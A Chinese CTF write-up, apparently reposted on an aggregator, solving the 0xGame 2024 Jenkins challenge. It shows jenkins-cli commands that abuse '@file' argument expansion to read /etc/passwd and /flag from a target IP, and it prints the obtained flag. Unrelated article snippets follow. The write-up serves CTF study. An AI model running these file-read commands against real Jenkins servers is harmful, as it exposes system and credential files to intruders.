0xGame 2024 [Week 4] Jenkins

news/2024/12/5 17:42:39/

1.前言

由于好久没做web题了,所以今天来尝试来做一波web题,仅供刷题记录。

2.题目

这个给的提示对于小白来说实在是友好的过劲。

3.分析

上网搜到一个关于Jenkins的历史漏洞,下面链接可供参考

https://blog.csdn.net/2301_80127209/article/details/139777834icon-default.png?t=O83Ahttps://blog.csdn.net/2301_80127209/article/details/139777834

打开页面


利用框架漏洞  ,路径后进行添加   /jnlpJars/jenkins-cli.jar,下载下来文件



进行读取文件   ,这里我把下载下来的文件放在了z盘,大家要根据其文件实际位置进行操作

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http who-am-i "@/etc/passwd"

成功实现任意文件读取功能 ,但只是显示了一部分

尝试目标是否开启了“匿名用户可读”选项,开启了话则可以显示全部命令,当然这一步也可省略,但是我们可以测试一波也花不了多长时间

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/etc/passwd"

这时候我们可以尝试读取flag内容了,根据做题经验,猜测flag在根目录下
 

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/flag"

成功获取到flag

4.答案

0xgame{2a6d2b88-7d12-4b66-901d-5ed489e9a322}


http://www.ppmy.cn/news/1544418.html

相关文章

[FE] React 初窥门径(四):React 组件的加载过程(render 阶段)

1. 回顾 前几篇文章中,我们采用了 VSCode 插件 CodeTour 来记录代码的执行过程, 并把相关的数据 .tour/ 放到了 github: thzt/react-tour 中。 截止到本文为之,我们总共记录了这些 code-tour, .tour/ ├── 2. 构建过程.tour ├─…

HTML入门教程22:HTML文件路径

一、绝对路径 定义&#xff1a;绝对路径是从网站根目录开始的完整路径&#xff0c;它包含了协议、域名和文件路径。例如&#xff0c;<script src"https://www.example.com/js/script.js"></script>就使用了绝对路径来引用外部的JavaScript文件。特点&am…

Gitlab-runner running on Kubernetes - hostAliases

*Config like this. *That in your helm values.yaml.

Redis设计与实现 学习笔记 第十四章 服务器

Redis服务器负责与多个客户端建立网络连接&#xff0c;处理客户端发送的命令请求&#xff0c;在数据库中保存客户端执行命令所产生的数据&#xff0c;并通过资源管理来维持服务器自身的运转。 14.1 命令请求的执行过程 如果我们使用客户端执行以下命令&#xff1a; 那么从客…

为Meta Spark准备3D模型

有许多工具可以帮助你为 Meta Spark Studio 创建 3D 对象&#xff0c;包括 Cinema4D、Blender 和 3ds Max。你还可以使用 Meta Spark Toolkit 优化 Blender 对象。 在本指南中&#xff0c;我们将介绍正确的设置&#xff0c;以便你可以成功地为 Meta Spark Studio 准备对象&…

b站小土堆PyTorch视频学习笔记(CIFAR10数据集分类实例)

1、准备数据集并查看数据集长度 train_data torchvision.datasets.CIFAR10(root"./data", trainTrue, transformtorchvision.transforms.ToTensor(), downloadTrue) test_data torchvision.datasets.CIFAR10(root"./data", trainFalse, transformtorch…

java项目之微服务在线教育系统设计与实现(springcloud)

风定落花生&#xff0c;歌声逐流水&#xff0c;大家好我是风歌&#xff0c;混迹在java圈的辛苦码农。今天要和大家聊的是一款基于springboot的闲一品交易平台。项目源码以及部署相关请联系风歌&#xff0c;文末附上联系信息 。 项目简介&#xff1a; 微服务在线教育系统设计与…

7thonline第七在线7大价值助力品牌实现智能化商品管理

在高波动和不确定的商业环境中&#xff0c;精准的销售预测对于零售品牌灵活应对市场需求、降低决策风险至关重要。